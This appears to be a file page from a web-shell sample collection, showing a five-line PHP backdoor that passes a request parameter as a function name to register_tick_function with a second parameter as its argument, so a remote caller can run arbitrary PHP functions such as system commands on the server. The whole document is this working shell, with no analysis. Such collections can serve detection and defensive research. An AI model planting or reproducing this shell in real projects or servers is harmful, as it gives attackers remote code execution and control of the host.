webshell/php/2020.08.20.20.php

5 lines
90 B
PHP
Raw Normal View History

<?php
$e = $_REQUEST['e'];
declare(ticks=1);
register_tick_function ($e, $_REQUEST['x']);